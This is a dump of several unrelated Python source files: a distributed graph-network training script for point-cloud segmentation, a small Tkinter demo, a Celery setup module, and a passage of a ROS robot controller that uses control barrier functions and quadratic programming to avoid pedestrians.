examples/sem_seg_dense/train.py | megaelius/deep_gcns_torch | 0 | 16911 |
import __init__
import os
#os.environ['LD_LIBRARY_PATH'] += ':/usr/local/cuda-11.1/bin64:/usr/local/cuda-11.2/bin64'
import numpy as np
import torch
import torch.multiprocessing as mp
import torch_geometric.datasets as GeoData
from torch_geometric.loader import DenseDataLoader
import torch_geometric.transforms as T
from torch.nn.parallel import DistributedDataParallel
from torch.utils.data.distributed import DistributedSampler
from config import OptInit
from architecture import DenseDeepGCN, CustomDenseDeepGCN
from utils.ckpt_util import load_pretrained_models, load_pretrained_optimizer, save_checkpoint
from utils.metrics import AverageMeter
import logging
from tqdm import tqdm
from parallel_wrapper import launch
import comm
from torch.utils.tensorboard import SummaryWriter
writer = SummaryWriter(log_dir='log/mlp4')
def train(model, train_loader, optimizer, criterion, opt, cur_rank):
    """Run one training epoch.

    Mutates ``opt`` in place: increments ``opt.iter`` per batch and
    updates the running loss meter ``opt.losses``.  Progress is shown
    through the tqdm wrapper around the loader.
    """
    opt.losses.reset()
    model.train()
    with tqdm(train_loader) as tqdm_loader:
        for i, data in enumerate(tqdm_loader):
            opt.iter += 1
            desc = 'Epoch:{} Iter:{} [{}/{}] Loss:{Losses.avg: .4f}'\
                .format(opt.epoch, opt.iter, i + 1, len(train_loader), Losses=opt.losses)
            tqdm_loader.set_description(desc)
            # Concatenate point positions and features into one dense
            # channels-first input tensor with a trailing singleton dim.
            inputs = torch.cat((data.pos.transpose(2, 1).unsqueeze(3), data.x.transpose(2, 1).unsqueeze(3)), 1)
            gt = data.y.to(opt.device)
            # ------------------ zero, output, loss
            optimizer.zero_grad()
            out = model(inputs)
            loss = criterion(out, gt)
            # ------------------ optimization
            loss.backward()
            optimizer.step()
            opt.losses.update(loss.item())
def test(model, loader, opt, cur_rank):
    """Evaluate mean IoU over *loader* and store it in ``opt.test_value``."""
    intersections = np.empty((len(loader), opt.n_classes))
    unions = np.empty((len(loader), opt.n_classes))
    model.eval()
    with torch.no_grad():
        for batch_idx, data in enumerate(tqdm(loader)):
            inputs = torch.cat(
                (data.pos.transpose(2, 1).unsqueeze(3),
                 data.x.transpose(2, 1).unsqueeze(3)), 1)
            labels = data.y
            logits = model(inputs)
            predictions = logits.max(dim=1)[1]
            pred_np = predictions.cpu().numpy()
            target_np = labels.cpu().numpy()
            for cl in range(opt.n_classes):
                gt_mask = target_np == cl
                pred_mask = pred_np == cl
                intersections[batch_idx, cl] = np.sum(
                    np.logical_and(pred_mask, gt_mask), dtype=np.float32)
                unions[batch_idx, cl] = np.sum(
                    np.logical_or(pred_mask, gt_mask), dtype=np.float32)
    ious = np.divide(np.sum(intersections, 0), np.sum(unions, 0))
    # A class absent from both prediction and ground truth gives 0/0;
    # count it as a perfect score, matching the original behavior.
    ious[np.isnan(ious)] = 1
    iou = np.mean(ious)
    if opt.phase == 'test':
        for cl in range(opt.n_classes):
            logging.info("===> mIOU for class {}: {}".format(cl, ious[cl]))
    opt.test_value = iou
    logging.info('TEST Epoch: [{}]\t mIoU: {:.4f}\t'.format(opt.epoch, opt.test_value))
def epochs(opt):
    """Full distributed training loop for one worker process.

    Builds S3DIS dataloaders with DistributedSampler, wraps the model in
    DistributedDataParallel on this process's local GPU rank, optionally
    restores a checkpoint, then alternates train/eval epochs.  Only the
    main process writes checkpoints and tensorboard scalars.
    """
    logging.info('===> Creating dataloader ...')
    train_dataset = GeoData.S3DIS(opt.data_dir, opt.area, True, pre_transform=T.NormalizeScale())
    train_sampler = DistributedSampler(train_dataset, shuffle=True, seed=opt.seed)
    train_loader = DenseDataLoader(train_dataset, batch_size=opt.batch_size, shuffle=False, sampler = train_sampler, num_workers=opt.n_gpus)
    test_dataset = GeoData.S3DIS(opt.data_dir, opt.area, train=False, pre_transform=T.NormalizeScale())
    test_sampler = DistributedSampler(test_dataset, shuffle=False, seed=opt.seed)
    test_loader = DenseDataLoader(test_dataset, batch_size=opt.batch_size, shuffle=False, sampler = test_sampler, num_workers=opt.n_gpus)
    opt.n_classes = train_loader.dataset.num_classes

    # Each spawned process drives exactly one GPU.
    cur_rank = comm.get_local_rank()
    logging.info('===> Loading the network ...')
    model = DistributedDataParallel(CustomDenseDeepGCN(opt).to(cur_rank),device_ids=[cur_rank], output_device=cur_rank,broadcast_buffers=False).to(cur_rank)

    logging.info('===> loading pre-trained ...')
    model, opt.best_value, opt.epoch = load_pretrained_models(model, opt.pretrained_model, opt.phase)
    logging.info(model)

    logging.info('===> Init the optimizer ...')
    criterion = torch.nn.CrossEntropyLoss().to(cur_rank)
    optimizer = torch.optim.Adam(model.parameters(), lr=opt.lr)
    scheduler = torch.optim.lr_scheduler.StepLR(optimizer, opt.lr_adjust_freq, opt.lr_decay_rate)
    optimizer, scheduler, opt.lr = load_pretrained_optimizer(opt.pretrained_model, optimizer, scheduler, opt.lr)

    logging.info('===> Init Metric ...')
    opt.losses = AverageMeter()
    opt.test_value = 0.

    logging.info('===> start training ...')
    for _ in range(opt.epoch, opt.total_epochs):
        opt.epoch += 1
        # Re-seed the samplers so each epoch shuffles differently but
        # consistently across ranks.
        train_sampler.set_epoch(opt.epoch)
        test_sampler.set_epoch(opt.epoch)
        logging.info('Epoch:{}'.format(opt.epoch))
        train(model, train_loader, optimizer, criterion, opt, cur_rank)
        if opt.epoch % opt.eval_freq == 0 and opt.eval_freq != -1:
            test(model, test_loader, opt, cur_rank)
        scheduler.step()
        if comm.is_main_process():
            # ------------------ save checkpoints
            # min or max. based on the metrics
            # NOTE(review): IoU is a higher-is-better metric, so
            # "test_value < best_value" looks inverted — confirm whether
            # is_best should be (opt.test_value > opt.best_value).
            is_best = (opt.test_value < opt.best_value)
            opt.best_value = max(opt.test_value, opt.best_value)
            # Move weights to CPU before serializing the checkpoint.
            model_cpu = {k: v.cpu() for k, v in model.state_dict().items()}
            save_checkpoint({
                'epoch': opt.epoch,
                'state_dict': model_cpu,
                'optimizer_state_dict': optimizer.state_dict(),
                'scheduler_state_dict': scheduler.state_dict(),
                'best_value': opt.best_value,
            }, is_best, opt.ckpt_dir, opt.exp_name)

            # ------------------ tensorboard log
            info = {
                'loss': opt.losses.avg,
                'test_value': opt.test_value,
                'lr': scheduler.get_lr()[0]
            }
            writer.add_scalar('Train Loss', info['loss'], opt.epoch)
            writer.add_scalar('Test IOU', info['test_value'], opt.epoch)
            writer.add_scalar('lr', info['lr'], opt.epoch)
    logging.info('Saving the final model.Finish!')
def hola():
    """Print a Spanish greeting (simple smoke-test helper)."""
    greeting = 'Hola'
    print(greeting)
def main():
    """Parse CLI/config options and launch one training process per GPU."""
    opt = OptInit().get_args()
    '''
    This wrapper taken from detectron2 (https://github.com/facebookresearch/detectron2/blob/main/detectron2/engine/launch.py),
    creates n_gpus processes and launches epochs function on each of them.
    '''
    launch(
        epochs,
        num_gpus_per_machine=opt.n_gpus,
        num_machines=1,
        machine_rank=0,
        dist_url='auto',
        args=(opt,)
    )
    # Single-process fallback (bypasses the distributed launcher):
    #epochs(opt)
if __name__ == '__main__':
main() | 1.9375 | 2 |
sources/tkinter/prog03.py | kantel/pythoncuriosa | 0 | 16912 | import tkinter as tk
from tkinter import ttk
# Minimal Tkinter demo: a label, a text entry and a button whose
# callback greets the name typed into the entry.
win = tk.Tk()
win.title("Python GUI")
win.resizable(False, False)
win.configure(background = "grey94")

a_label = ttk.Label(win, text = "Gib Deinen Namen ein:")
a_label.grid(column = 0, row = 0)
a_label.grid_configure(padx = 8, pady = 8)

def clickMe():
    # Button callback: rewrite the button caption with a greeting for the
    # current entry text (closes over the later-defined globals
    # ``action`` and ``name``, which exist before the mainloop starts).
    action.configure(text = "Hallöchen " + name.get())

name = tk.StringVar()
name_entered = ttk.Entry(win, width = 12, textvariable = name)
name_entered.grid(column = 0, row = 1)
name_entered.grid_configure(padx = 8, pady = 8)
name_entered.focus()  # place the cursor in the entry on startup

action = ttk.Button(win, text = "Drück mich!", command = clickMe)
action.grid(column = 1, row = 1)
action.grid_configure(padx = 8, pady = 8)

win.mainloop()  # blocks until the window is closed
openarticlegauge/slavedriver.py | CottageLabs/OpenArticleGauge | 1 | 16913 | <reponame>CottageLabs/OpenArticleGauge<filename>openarticlegauge/slavedriver.py
"""
Initialise the Celery instance to be used by the application
This is largely just boiler plate, and we could probably look at coming back to it and cleaning it
up a bit in the future.
"""
from __future__ import absolute_import
from celery import Celery

# Celery application instance shared by the whole project; tasks are
# registered against this object.
celery = Celery()

# Broker/backend settings live in the project's celeryconfig module.
from openarticlegauge import celeryconfig
celery.config_from_object(celeryconfig)

# Optional configuration, see the application user guide.
celery.conf.update(
    CELERY_TASK_RESULT_EXPIRES=3600,
)

if __name__ == '__main__':
    # Allow running a worker directly from this module.
    celery.start()
| 1.6875 | 2 |
cbf_ros/scripts/cbf_controller_sy.py | k1majd/CBF_TB_RRT | 2 | 16914 | #! /usr/bin/env python
# call roscore
# $ roscore
#
# If start in manual
# $ rosrun cbf_ros cbf_controller.py
import rospy
import sys
import argparse
import re
import numpy as np
from scipy.integrate import odeint
from sympy import symbols, Matrix, sin, cos, lambdify, exp, sqrt, log
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import cvxopt as cvxopt
# ROS msg
from geometry_msgs.msg import Twist
from geometry_msgs.msg import PoseStamped
from geometry_msgs.msg import Vector3
from nav_msgs.msg import Odometry
from gazebo_msgs.msg import ModelState
from gazebo_msgs.srv import GetWorldProperties, GetModelState, GetModelStateRequest
# ROS others
import tf
DEBUG = False
def orientation2angular(orientation):
    """Convert a quaternion orientation message into Euler angles.

    Parameters
    ----------
    orientation : geometry_msgs quaternion with x/y/z/w fields.

    Returns
    -------
    Vector3 holding the Euler angles (roll, pitch, yaw) produced by
    tf.transformations.euler_from_quaternion.
    """
    quat = (orientation.x, orientation.y, orientation.z, orientation.w)
    roll, pitch, yaw = tf.transformations.euler_from_quaternion(quat)
    return Vector3(roll, pitch, yaw)
def cvxopt_solve_qp(P, q, G=None, h=None, A=None, b=None):
    """Solve the QP  min 0.5 x'Px + q'x  s.t.  Gx <= h, Ax = b  via cvxopt.

    Returns the solution as a flat numpy array of length P.shape[1], or
    None when the solver does not report an 'optimal' status.
    """
    P = .5 * (P + P.T)  # symmetrise P; cvxopt expects a symmetric Hessian
    qp_args = [cvxopt.matrix(P), cvxopt.matrix(q)]
    if G is not None:
        qp_args.append(cvxopt.matrix(G))
        qp_args.append(cvxopt.matrix(h))
    if A is not None:
        qp_args.append(cvxopt.matrix(A))
        qp_args.append(cvxopt.matrix(b))
    # Silence per-iteration output and cap the iteration count.
    cvxopt.solvers.options['show_progress'] = False
    cvxopt.solvers.options['maxiters'] = 100
    solution = cvxopt.solvers.qp(*qp_args)
    if 'optimal' not in solution['status']:
        return None
    return np.array(solution['x']).reshape((P.shape[1],))
def plottrajs(trajs):
    """Plot the recorded robot/actor trajectories and control history.

    `trajs` carries parallel lists filled by the controller loop:
    hsr (robot [x, y, theta]), actors (per-step list of [x, y, theta]),
    commands ([v, w]), time, risk and minDist.
    Depends on module-level globals `plotanimation` and `risk`
    (set in the __main__ block).
    Note: plots use (y, -x) so the Gazebo frame is rotated on screen.
    """
    if plotanimation:
        # Replay the run frame-by-frame: walls, robot pose + velocity arrow,
        # and actor positions, clearing the figure between frames.
        for j in range(len(trajs.hsr)):
            plt.axis([-10,10,-10,10],color ="black")
            plt.plot([-1.4,-1.4],[-7,7],color ="black")
            plt.plot([1.3,1.3],[-7,-1.5],color ="black")
            plt.plot([1.3,1.3],[1.4,7],color ="black")
            plt.plot([1.3,7],[1.4,1.4],color ="black")
            plt.plot([1.3,7],[-1.5,-1.5],color ="black")
            plt.plot(trajs.hsr[j][1],-trajs.hsr[j][0],color ="green",marker = 'o')
            plt.arrow(float(trajs.hsr[j][1]),float(-trajs.hsr[j][0]), float(2*trajs.commands[j][0]*sin(trajs.hsr[j][2])), float(-2*trajs.commands[j][0]*cos(trajs.hsr[j][2])), width = 0.05)
            for k in range(len(trajs.actors[j])):
                plt.plot(trajs.actors[j][k][1],-trajs.actors[j][k][0],color ="red",marker = 'o')
            plt.draw()
            plt.pause(np.finfo(float).eps)
            plt.clf()
    # Static overview: draw the walls once, then overlay every recorded
    # robot (green) and actor (red) position.
    plt.ion()
    plt.axis([-10,10,-10,10],color ="black")
    plt.plot([-1.4,-1.4],[-7,7],color ="black")
    plt.plot([1.3,1.3],[-7,-1.5],color ="black")
    plt.plot([1.3,1.3],[1.4,7],color ="black")
    plt.plot([1.3,7],[1.4,1.4],color ="black")
    plt.plot([1.3,7],[-1.5,-1.5],color ="black")
    for j in range(len(trajs.hsr)):
        plt.axis([-10,10,-10,10])
        plt.plot(trajs.hsr[j][1],-trajs.hsr[j][0],color ="green",marker = 'o',markersize=2)
        for k in range(len(trajs.actors[j])):
            plt.plot(trajs.actors[j][k][1],-trajs.actors[j][k][0],color ="red",marker = 'o',markersize=2)
        plt.draw()
        plt.pause(np.finfo(float).eps)
    plt.ioff()
    # Time-series panels: v, w, risk (green below the `risk` threshold,
    # red above) and minimum distance to any actor.
    fig, axs = plt.subplots(4)
    axs[0].set(ylabel = 'velocity input')
    # axs[1].set_title('risk')
    # axs[2].set_title('min Dist')
    axs[1].set(ylabel = 'angular velocity input')
    axs[2].set(ylabel = 'risk')
    axs[3].set(xlabel = 'time', ylabel = 'min Dist')
    for k in range(len(trajs.time)):
        axs[0].plot(trajs.time[k], trajs.commands[k][0],color ="green",marker = 'o',markersize=2)
        axs[1].plot(trajs.time[k], trajs.commands[k][1],color ="green",marker = 'o',markersize=2)
        if trajs.risk[k]<risk:
            axs[2].plot(trajs.time[k], trajs.risk[k],color ="green",marker = 'o',markersize=2)
        else:
            axs[2].plot(trajs.time[k], trajs.risk[k],color ="red",marker = 'o',markersize=2)
        axs[3].plot(trajs.time[k], trajs.minDist[k],color ="green",marker = 'o',markersize=2)
    plt.draw()
    plt.pause(60)
    1  # NOTE(review): no-op statement, likely a leftover breakpoint anchor
    # plt.ioff()
    # plt.figure(3)
    # for k in range(len(trajs.time)):
    #     plt.plot(trajs.time[k], trajs.risk[k],color ="green",marker = 'o')
    # plt.draw()
    # 1
class robot(object):
    """Symbolic unicycle/bicycle robot model and CBF/Lyapunov factories.

    Builds sympy expressions for the robot dynamics and lambdifies them
    into fast numeric callables used by the QP controller:
      - GoalFuncs:   goal set and Lyapunov derivative,
      - UnsafeFuncs: per-obstacle stochastic CBF terms,
      - MapFuncs:    CBF terms for rectangular environment bounds.
    """
    def __init__(self,l):
        """Create the symbolic state/input vectors and dynamics.

        `l` is the look-ahead offset used to make the unicycle input map
        invertible (standard near-identity diffeomorphism trick).
        """
        #Symbolic Variables
        # t = symbols('t')
        # when robot is bicycle model [x,y,theta], obstacles are linear models [x,y]:
        xr1,xr2,xr3,xo1,xo2 = symbols('xr1 xr2 xr3 xo1 xo2')
        # v w inputs of robot:
        u1,u2 = symbols('u1,u2')
        vx,vy = symbols('vx,vy')
        # Vector of states and inputs:
        self.x_r_s = Matrix([xr1,xr2,xr3])
        self.x_o_s = Matrix([xo1,xo2])
        self.u_s = Matrix([u1,u2])
        self.u_o = Matrix([vx,vy])
        # Control-affine dynamics x_r' = f + g*u  (f = 0 for the unicycle).
        self.f = Matrix([0,0,0])
        self.g = Matrix([[cos(self.x_r_s[2]), -l*sin(self.x_r_s[2])], [sin(self.x_r_s[2]), l*cos(self.x_r_s[2])], [0, 1]])
        self.f_r = self.f+self.g*self.u_s
        self.l = l #approximation parameter for bicycle model
        # Map from the shifted (look-ahead) state back to the true robot pose.
        self.Real_x_r = lambdify([self.x_r_s], self.x_r_s-Matrix([l*cos(self.x_r_s[2]), l*sin(self.x_r_s[2]), 0]))
        # Obstacle SDE, not needed if we want to use Keyvan prediction method
        self.f_o = self.u_o
        # self.f_o = Matrix([0.1, 0.1])
        self.g_o = Matrix([0.1, 0.1])
        # NOTE(review): the line below immediately overwrites the g_o
        # assignment above — confirm which diffusion term is intended.
        self.g_o = 0.1*self.u_o
        # self.f_o_fun = lambdify([self.x_o_s], self.f_o)
        # self.g_o_fun = lambdify([self.x_o_s], self.g_o)
    def GoalFuncs(self,GoalCenter,rGoal):
        """Return callables for the circular goal set and its Lyapunov rate.

        Gset < 0 inside the goal disk of (squared) radius `rGoal` around
        `GoalCenter`; Lyap is d(Gset)/dt along the controlled dynamics.
        """
        Gset = (self.x_r_s[0]-GoalCenter[0])**2+(self.x_r_s[1]-GoalCenter[1])**2-rGoal
        GoalInfo = type('', (), {})()
        GoalInfo.set = lambdify([self.x_r_s],Gset)
        GoalInfo.Lyap = lambdify([self.x_r_s,self.u_s],Gset.diff(self.x_r_s).T*self.f_r)
        return GoalInfo
    def UnsafeFuncs(self,gamma,UnsafeRadius): #based on the SDE formulation, needs slight change for regular BF
        """Return callables for the per-obstacle stochastic barrier function.

        set < 0 means collision (robot within UnsafeRadius + l of the
        obstacle); CBF = exp(-gamma*set); ConstCond/multCond are the
        drift and input-dependent parts of the CBF time derivative.
        """
        UnsafeInfo = type('', (), {})()
        Uset = (self.x_r_s[0]-self.x_o_s[0])**2+(self.x_r_s[1]-self.x_o_s[1])**2-(UnsafeRadius+self.l)**2
        CBF = exp(-gamma*Uset)
        CBF_d = CBF.diff(Matrix([self.x_r_s,self.x_o_s]))
        CBF_d2 = CBF.diff(self.x_o_s,2)  # second derivative for the Ito correction term
        UnsafeInfo.set = lambdify([self.x_r_s,self.x_o_s], Uset)
        UnsafeInfo.CBF = lambdify([self.x_r_s,self.x_o_s], CBF)
        UnsafeInfo.ConstCond = lambdify([self.x_r_s,self.x_o_s,self.u_o] , CBF_d.T*Matrix([self.f,self.f_o])+0.5*(self.g_o.T*Matrix([[Matrix(CBF_d2[0,0]),Matrix(CBF_d2[1,0])]])*self.g_o))
        UnsafeInfo.multCond = lambdify([self.x_r_s,self.x_o_s,self.u_s], CBF_d.T*Matrix([self.g*self.u_s, Matrix(np.zeros((len(self.x_o_s),1)))]))
        return UnsafeInfo
    def MapFuncs(self,env_bounds):
        """Return CBF callables for whichever of x_min/x_max/y_min/y_max
        are present on `env_bounds`.

        NOTE(review): uses the module-level global `gamma` (set in
        __main__) rather than a parameter — confirm this is intentional.
        """
        MapInfo = type('', (), {})()
        MapInfo.set = []
        MapInfo.CBF = []
        MapInfo.setDer = []
        # x_min = getattr(env_bounds, "x_min", undefined)
        # x_max = getattr(env_bounds, "x_max", undefined)
        # y_min = getattr(env_bounds, "y_min", undefined)
        # y_max = getattr(env_bounds, "y_max", undefined)
        if hasattr(env_bounds,'x_min'):
            Uset = (-self.x_r_s[0]+env_bounds.x_min)
            CBF = exp(gamma*Uset)
            MapInfo.set.append(lambdify([self.x_r_s], Uset))
            MapInfo.CBF.append(lambdify([self.x_r_s],CBF))
            MapInfo.setDer.append(lambdify([self.x_r_s,self.u_s] , CBF.diff(self.x_r_s).T*self.f_r))
        if hasattr(env_bounds,'x_max'):
            Uset = (self.x_r_s[0]-env_bounds.x_max)
            CBF = exp(gamma*Uset)
            MapInfo.set.append(lambdify([self.x_r_s], Uset))
            MapInfo.CBF.append(lambdify([self.x_r_s],CBF))
            MapInfo.setDer.append(lambdify([self.x_r_s,self.u_s] , CBF.diff(self.x_r_s).T*self.f_r))
        if hasattr(env_bounds,'y_min'):
            Uset = (-self.x_r_s[1]+env_bounds.y_min)
            CBF = exp(gamma*Uset)
            MapInfo.set.append(lambdify([self.x_r_s], Uset))
            MapInfo.CBF.append(lambdify([self.x_r_s],CBF))
            MapInfo.setDer.append(lambdify([self.x_r_s,self.u_s] , CBF.diff(self.x_r_s).T*self.f_r))
        if hasattr(env_bounds,'y_max'):
            Uset = (self.x_r_s[1]-env_bounds.y_max)
            CBF = exp(gamma*Uset)
            MapInfo.set.append(lambdify([self.x_r_s], Uset))
            MapInfo.CBF.append(lambdify([self.x_r_s],CBF))
            MapInfo.setDer.append(lambdify([self.x_r_s,self.u_s] , CBF.diff(self.x_r_s).T*self.f_r))
        if hasattr(env_bounds,'f'):
            pass #To be filled later
        return MapInfo
class CBF_CONTROLLER(object):
    """ROS node body: risk-bounded CBF-QP velocity controller for the HSR.

    Subscribes to robot odometry, polls Gazebo for pedestrian ('actor*')
    poses, and at a fixed rate solves a QP that trades goal progress
    (Lyapunov constraint) against collision risk (stochastic CBF
    constraints) and map bounds, publishing the resulting (v, w) command.
    Reads several globals defined in __main__ (UnsafeInclude, risk, T, U,
    rGoal, findBestCommandAnyway).
    """
    def __init__(self,robot,GoalInfo,UnsafeInfo,MapInfo):
        """Wire up ROS pub/sub/services and initialise trajectory logs."""
        # publisher to send vw order to HSR
        self.vw_publisher = rospy.Publisher('/hsrb/command_velocity', Twist, queue_size=10)
        # subscriber for Gazebo info.
        rospy.wait_for_service ('/gazebo/get_model_state')
        self.get_model_pro = rospy.ServiceProxy('/gazebo/get_world_properties', GetWorldProperties)
        self.get_model_srv = rospy.ServiceProxy('/gazebo/get_model_state', GetModelState)
        self.tOdometry_subscriber = rospy.Subscriber('/hsrb/odom_ground_truth', Odometry, self.tOdometry_callback, queue_size=10)
        self.tOdometry = Odometry()
        self.odometry_subscriber = rospy.Subscriber('/global_pose', PoseStamped, self.odometry_callback, queue_size=10)
        self.poseStamped = PoseStamped()
        # listener of tf.
        self.tfListener = tf.TransformListener()
        self.actors = []  # Gazebo model names matching 'actor*'
        # Anonymous record object accumulating the run history for plotting.
        trajs = type('', (), {})()
        trajs.hsr = []
        trajs.actors = []
        trajs.commands = []
        trajs.time = []
        trajs.risk = []
        trajs.minDist = []
        self.trajs = trajs
        self.robot = robot
        self.GoalInfo = GoalInfo
        self.UnsafeInfo = UnsafeInfo
        self.MapInfo = MapInfo
        self.flag = 0  # set to 1 once the corridor map/goal switch has fired
        self.count = 0 # num of times control_callback is called
    def __del__(self):
        pass
    def tOdometry_callback(self, odometry):
        # NOTE(review): stored as self.odometry while __init__ initialises
        # self.tOdometry — the controller loop reads self.odometry, so the
        # first loop iteration depends on this callback having fired.
        self.odometry = odometry # this odometry's coodination is \map
    def odometry_callback(self, poseStamped):
        self.poseStamped = poseStamped
    def gazebo_pos_transformPose(self, frame_id, gazebo_pose):
        """Re-express a Gazebo /map pose in `frame_id`, retrying until tf
        has the transform (or ROS shuts down)."""
        gazebo_pose_temp = PoseStamped()
        gazebo_pose_temp.header = gazebo_pose.header
        gazebo_pose_temp.header.frame_id = 'map'
        gazebo_pose_temp.pose = gazebo_pose.pose
        while not rospy.is_shutdown():
            try:
                gazebo_pos_trans = self.tfListener.transformPose(frame_id, gazebo_pose_temp)
                break
            except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
                continue
        return gazebo_pos_trans
    def controller_loop_callback(self, event):
        """Periodic control step: sample actor/robot states, solve the QP,
        publish the velocity command, and handle termination."""
        # this controller loop call back.
        self.count += 1
        now = rospy.get_rostime()
        self.trajs.time.append(now.secs+now.nsecs*pow(10,-9))
        if DEBUG:
            rospy.loginfo('Current time %i %i', now.secs, now.nsecs)
            rospy.loginfo('tOdometry\n %s', self.odometry)
        # get human model state from Gazebo
        if self.count==1:
            # Discover actor model names once, on the first iteration.
            model_properties = self.get_model_pro()
            for model_name in model_properties.model_names:
                if re.search('actor*', model_name) and not model_name in self.actors: # if the model name is actor*, it will catch them.
                    self.actors.append(model_name)
        actors_data = []
        for actor in self.actors:
            model_actor = GetModelStateRequest()
            model_actor.model_name = actor
            model_actor = self.get_model_srv(model_actor) # the pose date is based on /map
            # actor_base_footprint_pose = self.gazebo_pos_transformPose('base_footprint', model_actor) # trasfer /map->/base_footprint
            angular = orientation2angular(model_actor.pose.orientation) # transfer orientaton(quaternion)->agular(euler)
            p = model_actor.pose.position
            actors_data.append([p.x,p.y, angular.z])
            if DEBUG:
                rospy.loginfo('%s in timestamp:\n%s', actor, model_actor.header.stamp) # time stamp is here.
                rospy.loginfo('%s in base_footprint\nposition:\n%s\nangular:\n%s', actor, actor_base_footprint_pose.pose.position, angular)
        self.trajs.actors.append(actors_data)
        # get hsr model state from odometry
        model_hsr = self.odometry
        p = model_hsr.pose.pose.position
        angular = orientation2angular(model_hsr.pose.pose.orientation) # transfer orientaton(quaternion)->agular(euler)
        x_r = [p.x,p.y,angular.z]
        self.trajs.hsr.append(x_r)
        # making vw data and publish it.
        vel_msg = Twist()
        # Compute controller
        if abs(p.x)<1.5 and self.flag == 0:
            # One-shot switch when the robot enters the corridor: tighten
            # the map bounds and move the goal (uses global rGoal).
            self.flag = 1
            env_bounds = type('', (), {})()
            env_bounds.x_max = 1.2
            env_bounds.x_min = -1.3
            self.MapInfo = self.robot.MapFuncs(env_bounds)
            GoalCenter = np.array([0, 5.5])
            self.GoalInfo = self.robot.GoalFuncs(GoalCenter,rGoal)
        u = self.cbf_controller_compute()
        vel_msg.linear.x = u[0]
        vel_msg.angular.z = u[1]
        self.vw_publisher.publish(vel_msg)
        self.trajs.commands.append([u[0],u[1]])
        if self.count > 1000:
            rospy.loginfo('reach counter!!')
            rospy.signal_shutdown('reach counter')
        elif self.GoalInfo.set(x_r)<0:
            rospy.loginfo('reached Goal set!!')
            rospy.signal_shutdown('reached Goal set')
    def cbf_controller_compute(self):
        """Build and solve the CBF-QP; return [v, w, slack...] (or [0, 0]
        when the QP is infeasible / the solver errors).

        Also appends the realised risk bound and the minimum obstacle
        distance to the trajectory log.
        """
        # Latest robot pose and actor poses; estimate actor velocities by
        # finite-differencing over the last three control periods.
        x_r = np.array(self.trajs.hsr[len(self.trajs.hsr)-1])
        x_o = np.array(self.trajs.actors[len(self.trajs.actors)-1])
        u_s = self.robot.u_s
        if self.count>3:
            x_o_pre = np.array(self.trajs.actors[len(self.trajs.actors)-4])
            # x_o_2pre = np.array(self.trajs.actors[len(self.trajs.actors)-3])
            dt = self.trajs.time[len(self.trajs.time)-1]-self.trajs.time[len(self.trajs.time)-4]
            u_o = (x_o[:,0:2]-x_o_pre[:,0:2])/dt
        else:
            u_o = np.zeros((len(x_o),len(self.robot.u_o)))
        Unsafe = self.UnsafeInfo
        Goal = self.GoalInfo
        Map = self.MapInfo
        # Only actors within the UnsafeInclude distance enter the QP.
        UnsafeList = []
        Dists = np.zeros((len(x_o)))
        for j in range(len(x_o)):
            Dists[j] = Unsafe.set(x_r, x_o[j][0:2])
            if Dists[j]<UnsafeInclude:
                UnsafeList.append(j)
        ai = 1
        if min(Dists)<0:
            InUnsafe = 1  # already inside some unsafe set
        else:
            InUnsafe = 0
        minDist = min(Dists)
        minJ = np.where(Dists == minDist)
        if findBestCommandAnyway:
            #Ax<=b, x = [v, w , b1,bh1 b2, bh2..., bn, b'1, b'2,b'm, delta ]
            # where b is constant in Eq (14) of paper "Risk-bounded Control using Stochastic Barrier Functions"
            #b' is the slack variable for map constraints
            # delta is for lyapunov function
            A = np.zeros((2*len(UnsafeList)+2*len(u_s)+len(Map.set)+2,len(u_s)+2*len(UnsafeList)+len(Map.set)+1))
            b =np.zeros((2*len(u_s)+2*len(UnsafeList)+len(Map.set)+2))
            for j in range(len(UnsafeList)):
                # CBF Constraints
                A[2*j,np.append(np.arange(len(u_s)),[len(u_s)+2*j])] = [Unsafe.multCond(x_r, x_o[UnsafeList[j]][0:2],[1, 0]), Unsafe.multCond(x_r,x_o[UnsafeList[j]][0:2],[0, 1]), -1] # multiplier of u , bi
                b[2*j] = -ai* Unsafe.CBF(x_r, x_o[UnsafeList[j]][0:2])- Unsafe.ConstCond(x_r, x_o[UnsafeList[j]][0:2],u_o[UnsafeList[j]])
                # Constraints on bi to satisfy pi risk
                A[2*j+1,len(u_s)+2*j] = 1; A[2*j+1,len(u_s)+2*j+1] = -1
                if Unsafe.CBF(x_r, x_o[UnsafeList[j]][0:2])<1:
                    b[2*j+1] = min(ai, -1/T*log((1-risk)/(1-Unsafe.CBF(x_r, x_o[UnsafeList[j]][0:2]))))
                else:
                    b[2*j+1] = 0
            # Adding U constraint
            A[2*len(UnsafeList),0] = 1; b[2*len(UnsafeList)] = U[0,1]
            A[2*len(UnsafeList)+1,0] = -1; b[2*len(UnsafeList)+1] = -U[0,0]
            A[2*len(UnsafeList)+2,1] = 1; b[2*len(UnsafeList)+2] = U[1,1]
            A[2*len(UnsafeList)+3,1] = -1; b[2*len(UnsafeList)+3] = -U[1,0]
            # Adding map constraints
            for j in range(len(Map.set)):
                A[2*len(UnsafeList)+2*len(u_s)+j,np.append(np.arange(len(u_s)),[len(u_s)+2*len(UnsafeList)+j])] = [Map.setDer[j](x_r,[1, 0]), Map.setDer[j](x_r,[0, 1]), -1]
                b[2*len(UnsafeList)+2*len(u_s)+j] = -Map.CBF[j](x_r)
            # Adding Goal based Lyapunov !!!!!!!!!!!!!!!!! Needs to be changed for a different example
            A[2*len(UnsafeList)+2*len(u_s)+len(Map.set),0:2] = [Goal.Lyap(x_r,[1,0]), Goal.Lyap(x_r,[0, 1])]
            A[2*len(UnsafeList)+2*len(u_s)+len(Map.set),-1] = -1
            b[2*len(UnsafeList)+2*len(u_s)+len(Map.set)] = 0
            A[2*len(UnsafeList)+2*len(u_s)+len(Map.set)+1,-1] = 1
            b[2*len(UnsafeList)+2*len(u_s)+len(Map.set)+1] = np.finfo(float).eps+1
            # Quadratic cost: penalise the risk slack bh heavily; linear
            # cost pushes the CBF constants b and map slacks down.
            H = np.zeros((len(u_s)+2*len(UnsafeList)+len(Map.set)+1,len(u_s)+2*len(UnsafeList)+len(Map.set)+1))
            H[0,0] = 0
            H[1,1] = 0
            ff = np.zeros((len(u_s)+2*len(UnsafeList)+len(Map.set)+1,1))
            for j in range(len(UnsafeList)):
                ff[len(u_s)+2*j] = 65
                H[len(u_s)+2*j+1,len(u_s)+2*j+1] = 10000
                # ff[len(u_s)+2*j+1] = 50* Unsafe.CBF(x_r, x_o[minJ[0][0]][0:2])
